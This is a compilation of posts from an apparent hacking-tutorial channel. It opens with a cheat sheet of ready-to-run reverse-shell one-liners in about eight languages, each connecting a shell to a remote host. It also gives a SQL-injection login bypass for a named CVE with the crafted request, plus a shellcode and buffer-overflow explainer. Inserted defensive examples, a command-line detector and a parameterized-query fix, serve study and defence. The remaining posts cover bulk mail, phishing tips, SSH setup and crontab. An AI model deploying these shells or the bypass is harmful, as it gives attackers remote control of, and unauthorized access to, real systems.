UNDERCODE SECURITY
🦑WELCOME TO UNDERCODE TESTING TO LEARN HACKING | PROGRAMMING | SECURITY & more..

THIS CHANNEL BY :

@UndercodeTesting
UndercodeTesting.com (official)

@iUndercode
iUndercode.com (iOs)

@Dailycve
DailyCve.com


@UndercodeNews
UndercodeNews.com
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Reverse shell methods in multiple programming languages under Linux:

Bash command: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Perl version: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python version: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP version: php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby version: ruby -rsocket -e 'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

nc version: nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
nc xxxx 8888|/bin/sh|nc xxxx 9999

Java version: r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Lua version: lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"

Use for learning.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
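
For defenders, the one-liners above share a few recognizable command-line shapes. The following is an added example, not part of the original post: a first-pass detector run over process command lines. The rule names, the tab-separated input format and the sample lines are constructed assumptions.

```python
import re

# One rule per command-line shape seen in the one-liners above.
RULES = [
    ("bash_dev_tcp",   re.compile(r"/dev/(?:tcp|udp)/[^/\s]+/\d+")),
    ("nc_exec",        re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-[a-z]*e\s+\S*sh\b")),
    ("mkfifo_nc_pipe", re.compile(r"\bmkfifo\b.*\|\s*\S*sh\b.*\|\s*(?:nc|ncat|netcat)\b")),
    ("nc_sh_nc_pipe",  re.compile(r"\b(?:nc|ncat|netcat)\b[^|]*\|\s*\S*sh\b[^|]*\|\s*(?:nc|ncat|netcat)\b")),
    ("perl_socket",    re.compile(r"\bperl\b.*\buse\s+Socket\b.*\bexec\b")),
    ("python_dup2",    re.compile(r"\bpython[\d.]*\b.*\bsocket\b.*\bdup2\b")),
    ("php_fsockopen",  re.compile(r"\bphp\b.*\bfsockopen\b.*\bexec\b")),
    ("ruby_tcpsocket", re.compile(r"\bruby\b.*\bTCPSocket\b.*\bexec\b")),
    ("lua_socket",     re.compile(r"\blua\b.*socket\.tcp\b.*os\.execute")),
]

# Constructed sample: "user<TAB>command line", as exported from
# process-execution telemetry. Addresses are documentation ranges.
SAMPLE = "\n".join([
    "www-data\tbash -i >& /dev/tcp/192.0.2.10/8080 0>&1",
    "www-data\tnc -e /bin/sh 192.0.2.10 1234",
    "alice\trsync -a -e ssh /srv/data backup:/srv/data",
    "bob\tpython3 -c 'import socket; print(socket.gethostname())'",
    "www-data\trm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.0.2.10 1234 >/tmp/f",
    "carol\tnc -zv 192.0.2.20 22",
    "www-data\tphp -r '$sock=fsockopen(\"192.0.2.10\",1234);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
    "www-data\tnc 192.0.2.10 8888|/bin/sh|nc 192.0.2.10 9999",
])


def match_rules(cmdline):
    """Return the names of all rules that match one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(text):
    """Return (line number, user, matched rules) for every suspicious line."""
    alerts = []
    for lineno, line in enumerate(text.splitlines(), 1):
        user, _, cmdline = line.partition("\t")
        hits = match_rules(cmdline)
        if hits:
            alerts.append((lineno, user, hits))
    return alerts


if __name__ == "__main__":
    for lineno, user, hits in scan(SAMPLE):
        print(f"line {lineno}: user={user} rules={','.join(hits)}")
```

String matching on command lines is a first-pass signal only; pair it with alerts on interactive shells whose standard input and output are a network socket.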
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Latest 2020: Daily Tracker System 1.0 - Authentication Bypass
#Exploit

CVE ID: CVE-2020-24193
Date: September 2, 2020


# Vulnerable Source Code

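<?php
// $con is the mysqli connection opened elsewhere in the application.
if(isset($_POST['login']))
{
    $email=$_POST['email'];              // attacker-controlled, used unescaped below
    $password=md5($_POST['password']);
    // Vulnerable: $email is concatenated straight into the SQL string.
    $query=mysqli_query($con,"select ID from tbluser where Email='$email' && Password='$password' ");
    $ret=mysqli_fetch_array($query);
    if($ret>0){
        $_SESSION['detsuid']=$ret['ID'];
        header('location:dashboard.php');
    }
    else{
        $msg="Invalid Details.";
    }
}
?>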


# Malicious POST Request to https://TARGET/dets/index.php HTTP/1.1
POST /dets/index.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.65.130/dets/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
DNT: 1
Connection: close
Cookie: PHPSESSID=j3j54s5keclr8ol2ou4f9b518s
Upgrade-Insecure-Requests: 1

email='+or+1%3d1+--+hyd3sec&password=badPass&login=login
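
Why that request body logs in, and how binding parameters stops it, shown as an added example that is not code from the advisory or the application. Python with an in-memory SQLite table stands in for PHP/MySQL (so `&&` becomes `and`); the table and column names come from the page, while the account row and the GOOD request are constructed.

```python
import hashlib
import sqlite3
from urllib.parse import parse_qs

# Request body from the post above, and a constructed legitimate login.
BODY = "email='+or+1%3d1+--+hyd3sec&password=badPass&login=login"
GOOD = "email=admin%40example.test&password=S3cret%21&login=login"


def make_db():
    """Create the tbluser table with one constructed account."""
    con = sqlite3.connect(":memory:")
    con.execute("create table tbluser "
                "(ID integer primary key, Email text, Password text)")
    # MD5 only mirrors the page's code; it is not a sound password hash.
    con.execute("insert into tbluser (Email, Password) values (?, ?)",
                ("admin@example.test", hashlib.md5(b"S3cret!").hexdigest()))
    return con


def form_fields(body):
    """Decode the form body the way PHP fills $_POST, then hash the password."""
    form = parse_qs(body, keep_blank_values=True)
    email = form["email"][0]
    password = hashlib.md5(form["password"][0].encode()).hexdigest()
    return email, password


def login_concatenated(con, body):
    """Same shape as the vulnerable code: input pasted into the SQL text."""
    email, password = form_fields(body)
    sql = ("select ID from tbluser where Email='" + email +
           "' and Password='" + password + "'")
    # With BODY the statement becomes: ... where Email='' or 1=1 -- <rest ignored>
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(con, body):
    """Hardened form: values are bound, so quotes in input stay data."""
    email, password = form_fields(body)
    row = con.execute(
        "select ID from tbluser where Email=? and Password=?",
        (email, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("concatenated, crafted body :", login_concatenated(db, BODY))
    print("parameterized, crafted body:", login_parameterized(db, BODY))
    print("parameterized, valid login :", login_parameterized(db, GOOD))
```

In the PHP application itself the equivalent change is a mysqli prepared statement with bound parameters in place of the interpolated string.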

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Beginner Guide to Insecure Direct Object References (IDOR).pdf
OWASP definition: Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system, and more. This is caused by the fact that the application takes user-supplied input and uses it to retrieve an object without performing sufficient authorization checks.
The application uses unverified data in a SQL call that accesses account information.
Let's consider a scenario where a web application allows the logged-in user to change his secret value.
Here you can see that the secret value must refer to some user account in the database.
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 bulk mail:

F E A T U R E S :

Active on Slack. Join the bulk-mail-cli Slack group for suggestions, bugs reports, support, and core development.

Shoot mails using CSV.

Mail dynamic HTML Templates using the {{fname|lname}} syntax.

Set the sending interval time in Cron Expressions! Eg. */10 * * * * *

Unlimited attachments! Attach any files on your local computer or you may just provide a direct URL in configuration and bulk-mail-cli will download and send the attachment under dynamic filenames and pathnames.

Runs on cloud! Can be run on AWS EC2 servers and on any Node.js droplet on DigitalOcean.

It saves your campaign progress! You can pause and resume the Mail Campaign from where you left the last time.

Use .env variables to not hardcode the emails and passwords in configuration files.

Contentful demo files provided! You get many beautiful email templates to pick from!

WordPress and other CMS' friendly. Just export the list of your users, change the email containing column name to email and you are good to go!

I N S T A L L A T I O N  &  R U N :

1) git clone https://github.com/adventmail/bulk-mail-cli.git

2) cd bulk-mail-cli

3) Install bulk-mail-cli
Assuming that you have node and npm installed... Run the following in your terminal.

> npm i -g bulk-mail-cli

4) Just run bulkmail support in your terminal to see what commands and flags you can use to do awesome things.

5) To generate demo files, use the following command.

> bulkmail demo

6) Send the Mail
EMAIL="chandlerbing@friends.com" PASSWORD="secret" bulkmail -f bulkmail.json # reference the configuration file here (https://github.com/adventmail/bulk-mail-cli)

7) That will start the mailing process! After every mail it sends, it updates the configuration file with the emails that you sent the message to. So that when you run the same campaign next time, it will resume from where you paused. To start over, you can append the --restart flag to the command.

8) Dynamic data
You may add any other column featuring custom data in the CSV. Namely fname, lname, address, etc... to use in the Subject and Body of your campaign mail. You can use the CSV fields everywhere in the configuration files.

9) Syntax
The syntax can be used in the email section of the CSV and can also be used everywhere in the configuration file and HTML templates. The syntax will be processed by bulk-mail-cli to generate correct mail output.

{{Hi|Hello|Howdy}} 🙌

My name is {{fname}} {{lname}}.

How'yooou dooooing? 😁


more info on https://github.com/adventmail/bulk-mail-cli
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Guys, since Offensive removed the Wi-Fi driver from the Kali 2020 ISO, some hackers and beginners use old Kali versions such as 2019, and this is totally wrong!!
Kali 2019 includes many CVEs and bugs; any Kali 2019 is vulnerable to many exploits and totally unsafe, so Undercode recommends you always update your Linux OS, whatever it is: Parrot, Kali, Aubergine ...


> apt upgrade isn't the solution
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Here we list a few tips for preventing phishing scams. I hope this helps you:

1) Protect your computer with security software

We need antivirus software for many reasons. Special signatures built into antivirus software protect against known technology workarounds and loopholes. Just keep the software updating automatically so that it can deal with any new security threats.

2) Be careful what you click

It is fine to click on links when you are on trusted sites. However, following random-looking links in emails and instant messages is not smart. Hover over links that you are not sure about before clicking on them.

3) Check the security of the site

It's natural to be a little careful about giving out sensitive information, such as personal and financial data, on the Internet. However, as long as you are on a secure website, there is nothing to worry about. Before submitting any data, make sure that the site URL starts with "https" and that there is a closed padlock next to the address bar.

Also check the site's security certificate (SSL). If you receive a message that a particular website may contain malicious files, do not open it, and never download files from suspicious emails or websites. Even search engines can show convincing links that lead users to a phishing web page offering a low-priced product. If a user makes purchases on such a website, the payment card data will be available to cybercriminals.

4) Never share your personal data

In general, you should never share personal or financially sensitive information over the network. If you are unsure, go to the official website of the company in question and contact them directly.

Most phishing emails direct you to pages that ask for financial or personal information. A web user should never enter confidential data via links contained in emails, and never email confidential information to anyone. Make it a habit to check the website address. A secure website always starts with "https".

5) Always use firewalls

Last but not least, high-quality firewalls act as buffers between you, your computer, and external attackers. You should use two different types: a desktop firewall and a network firewall. The first is a kind of software, and the second is a kind of hardware. Used together, they drastically reduce the likelihood of hackers and phishers infiltrating your computer or your network.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑A simple way to make callers hear an "empty number" prompt when they call your phone:

> When you don't want to be disturbed by others but are embarrassed to turn off the phone, it is a good idea to have callers hear an empty-number prompt. Here is a way to make your mobile phone appear as an empty number at any time. It is very simple. Friends in need can make a note...

> Enter **21*999999# in standby mode and press the dial button. OK, done.

> In this state, anyone who calls you hears that the number is empty, and you will not receive the call.

> As a preliminary assessment, most phones can do this.

> Note: since not all models have been tested, we cannot guarantee the success rate.

> Reminder: in this state, even powering the phone off will not cancel it.

> The code to cancel the empty-number state is ##21#, entered the same way as above.

> Finally, remember to cancel the state when you are done, so as not to delay releasing the empty number.

> The principle is probably call forwarding; since the incoming call is never answered there is no charge, so this method will not waste your phone bill...

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to Enable SSH on Ubuntu :

1) Process for Enabling SSH
You can enable and run the SSH protocol on your server by following these four primary steps. These steps help you use the SSH network protocol effectively on Ubuntu 20.04.

Step 1 is the installation of SSH

Step 2 is enabling SSH

Step 3 is checking the status

Step 4 is connecting with the firewall port

2) Installation of SSH
To install, first run two commands to update and upgrade the system, then run the third sudo command to install SSH on your server. The commands are as follows:

$ sudo apt update

$ sudo apt upgrade

$ sudo apt install openssh-server

3) You can also use install ssh instead of openssh in the command, as both will download the open package of the SSH protocol. Type your password and continue the installation.

4) Enabling SSH
Now enable the network protocol in your operating system with the following command:

$ sudo systemctl enable --now ssh

5) That's all; you have successfully enabled the protocol for encrypted networking on your system.

Check Status

6) Now check the status of the service. The same command form is also used for stopping, reloading, and restarting it. Use the following command to check the status:

$ systemctl status ssh.service

7) To reload, restart, or stop the service instead, replace status in the command with reload, restart, or stop.

8) Connect with Firewall Port
If your firewall is active, it is recommended to allow connections to the server on port 22; also ensure that you are logged in to the server as the root user.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

> > SHELLS FOR BEGINNERS :

🦑What is Shellcode?

1) We know that shellcode has little to do with shell scripting, so why the name? The connection is that shellcode was typically used to open or 'pop' a shell – that is, an instance of a command line interpreter – so that an attacker could use the shell as a means of controlling the machine. Imagine that you could make a user enter a seemingly harmless string into a legitimate program on their device that would magically open the computer to a reverse shell.

2) That's the ultimate reward for pwning. Spawning a new process that launches a shell often requires very little code, so popping shells is a very lightweight, effective means of attack.

3) To achieve it, you'd need to find an exploitable program and craft a malicious input string – the shellcode – containing small chunks of executable code that force the program into popping a shell. This is possible because most programs, in order to be useful, need the ability to receive input: to read strings and other data supplied by the user or piped in from another program.

4) Shellcode exploits this requirement by containing instructions telling the program to do something it otherwise wouldn't or shouldn't. Of course, almost no program is going to easily misinterpret data as code without a bit of persuasion, and the primary name of the game when it comes to persuading programs to engage in this kind of undefined behavior is another hacking conversation favorite: the buffer overflow.

🦑Controlling Code Execution

1) When we create a buffer overflow, the aim is to write a sufficiently large amount of data into the program's memory so that two things happen. First, we fill up the allocated buffer, and second, we supply enough extra data to overwrite the address that will be executed next with our own code.

2) This isn't simple, but it might sound harder to do than it actually is. Because of the way program memory is laid out, when any function is called, there's always a pointer held in memory to the address of the next function that should be executed after the currently executing one; this pointer is known as the Instruction Pointer, sometimes referred to as EIP (32 bit) or RIP (64 bit).

3) By reverse engineering a particular program and with a lot of fuzzing and experimenting, we can determine both whether a given program contains any functions that are vulnerable to a buffer overflow and, if so, the address of the Instruction Pointer when that vulnerable function has finished calling.

4) Knowing the offset – the memory address – of the Instruction Pointer at that point in code means we can determine precisely how much extra data we need to overflow the buffer and insert our own code at the address of the Instruction Pointer. When we do that, the program will try to execute the code at the address we've written to the RIP register. If that code is junk, like in the example above, the program will crash, but if it isn't – if it's a valid address – things start to get more interesting.

source: wiki
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Learn CSS - The Complete Guide 2020 (incl. Flexbox, Grid & Sass)

https://drive.google.com/drive/folders/1z3L0qQPJS8MPTO1SblQcL66-2_Q6H8cY
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑MOST POPULAR CREDIT CARD MANAGER, TRUSTED APPS 2020 :

https://play.google.com/store/apps/details?id=net.thesimplest.creditcardmanager&utm_source=appgrooves&utm_medium=agp_ca9a9771141c52de8e4ccc1bf80b8f4c_net.thesimplest.creditcardmanager_us_others_16004994711195

https://play.google.com/store/apps/details?id=com.petalcard.petal&utm_source=appgrooves&utm_medium=agp_ca9a9771141c52de8e4ccc1bf80b8f4c_com.petalcard.petal_us_others_16004994753521

https://apps.apple.com/us/app/id1400353064?mt=8

https://apps.apple.com/us/app/id1428580080?mt=8

https://play.google.com/store/apps/details?id=com.ollocard.mobileapp&utm_source=appgrooves&utm_medium=agp_ca9a9771141c52de8e4ccc1bf80b8f4c_com.ollocard.mobileapp_us_others_16004994851710

https://apps.apple.com/us/app/id1427782837?mt=8

https://play.google.com/store/apps/details?id=com.creditonebank.mobile&utm_source=appgrooves&utm_medium=agp_ca9a9771141c52de8e4ccc1bf80b8f4c_com.creditonebank.mobile_us_others_16004994894729

https://apps.apple.com/us/app/id1128712763?mt=8

https://play.google.com/store/apps/details?id=com.firstpremier.mypremiercreditcard.app&utm_source=appgrooves&utm_medium=agp_ca9a9771141c52de8e4ccc1bf80b8f4c_com.firstpremier.mypremiercreditcard.app_us_others_16004994945189

https://apps.apple.com/us/app/id1476775662?mt=8

https://play.google.com/store/apps/details?id=com.discoverfinancial.mobile&utm_source=appgrooves&utm_medium=agp_ca9a9771141c52de8e4ccc1bf80b8f4c_com.discoverfinancial.mobile_us_others_16004994982236

https://apps.apple.com/us/app/id338010821?mt=8

https://play.google.com/store/apps/details?id=com.onlineceo.creditcardverifier&utm_source=appgrooves&utm_medium=agp_ca9a9771141c52de8e4ccc1bf80b8f4c_com.onlineceo.creditcardverifier_us_others_16004995052540

https://play.google.com/store/apps/details?id=com.debit_credit_card.creditcardmanager&utm_source=appgrooves&utm_medium=agp_ca9a9771141c52de8e4ccc1bf80b8f4c_com.debit_credit_card.creditcardmanager_us_others_16004995069099

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Pro Tips By undercode :
> Crontab Syntax and Statements


Crontab (cron table) is a text file that defines the schedule of cron jobs. Crontab files can be created, viewed, modified, and deleted using the crontab command.

Each line in the user's crontab contains six fields separated by a space: five time-and-date fields followed by the command to run:

* * * * * command(s)
^ ^ ^ ^ ^
| | | | |     allowed values
| | | | |     -------
| | | | ----- Day of week (0 - 7) (Sunday = 0 or 7)
| | | ------- Month (1 - 12)
| | --------- Day of month (1 - 31)
| ----------- Hour (0 - 23)
------------- Minute (0 - 59)

🦑The first five fields (time and date) also accept the following operators:

1) The asterisk operator (*) means all valid values. If you have an asterisk in the Minute field, it means the task will run every minute.

2) The hyphen operator (-) allows you to specify a range of values. If you set 1-5 in the Day of week field, the task will run every weekday (Monday through Friday). The range is inclusive, which means the first and last values are included in the range.

3) The comma operator (,) allows you to define a list of values to repeat. For example, if you have 1,3,5 in the Hour field, the task will run at 1, 3, and 5 AM. The list can contain individual values and ranges: 1-5,7,8,10-15

4) The forward slash operator (/) lets you specify step values that can be used in combination with ranges. For example, if you specify 1-10/2 in the Minute field, the action is performed every two minutes in the range 1 to 10, as if you had specified 1,3,5,7,9. Instead of a range of values, you can also use the asterisk operator. You can use "*/20" to run a task every 20 minutes.

🦑The syntax for system-wide crontabs is slightly different from user crontabs. It contains an additional required user field that specifies which user will run the cron job.

* * * * * <username> command(s)


1) To edit the crontab file, or create one if it does not exist, use the crontab -e command.

2) Run a cron job every 5 minutes
There are two ways to run a cron job every five minutes.

The first option is to use the comma operator to create a list of minutes:

0,5,10,15,20,25,30,35,40,45,50,55 * * * * command

The above line is syntactically correct and will work fine. However, typing the entire list is tedious and error-prone.

The second option to specify a job that will run every 5 minutes of the hour is to use the step operator:

*/5 * * * * command

*/5 means create a list of all minutes and run the job for every fifth value from the list.
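
The operator rules above, carried through in code: an added example (not from the original post) that expands each time field into the values it matches and reads the extra user field of a system-wide crontab, which is handy when auditing what a cron entry actually runs and as whom. It assumes numeric fields only; month and day names and @-shortcuts are not handled, and the sample lines in the test are constructed.

```python
# Field order and allowed ranges, taken from the diagram above.
FIELDS = [("minute", 0, 59), ("hour", 0, 23), ("day_of_month", 1, 31),
          ("month", 1, 12), ("day_of_week", 0, 7)]


def expand_field(expr, lo, hi):
    """Expand one time field (*, a-b, a,b,c and /step) into a sorted list."""
    values = set()
    for part in expr.split(","):
        rng, slash, step_text = part.partition("/")
        step = int(step_text) if slash else 1   # int("") raises ValueError
        if rng == "*":
            start, end = lo, hi
        elif "-" in rng:
            first, last = rng.split("-", 1)
            start, end = int(first), int(last)
        else:
            start = end = int(rng)
        if step < 1 or not lo <= start <= end <= hi:
            raise ValueError(f"bad field {part!r} for range {lo}-{hi}")
        values.update(range(start, end + 1, step))
    return sorted(values)


def parse_line(line, system=False):
    """Parse one crontab line; system=True expects the extra user field."""
    n = 6 if system else 5                      # fields before the command
    parts = line.split(None, n)
    if len(parts) != n + 1:
        raise ValueError("too few fields in crontab line")
    entry = {name: expand_field(parts[i], lo, hi)
             for i, (name, lo, hi) in enumerate(FIELDS)}
    # 0 and 7 both mean Sunday, so fold 7 onto 0.
    entry["day_of_week"] = sorted({v % 7 for v in entry["day_of_week"]})
    entry["user"] = parts[5] if system else None
    entry["command"] = parts[n]                 # remainder, spaces preserved
    return entry


if __name__ == "__main__":
    job = parse_line("*/5 * * * * root /usr/local/bin/backup.sh --quick",
                     system=True)
    print(job["user"], job["minute"], job["command"])
```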


▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁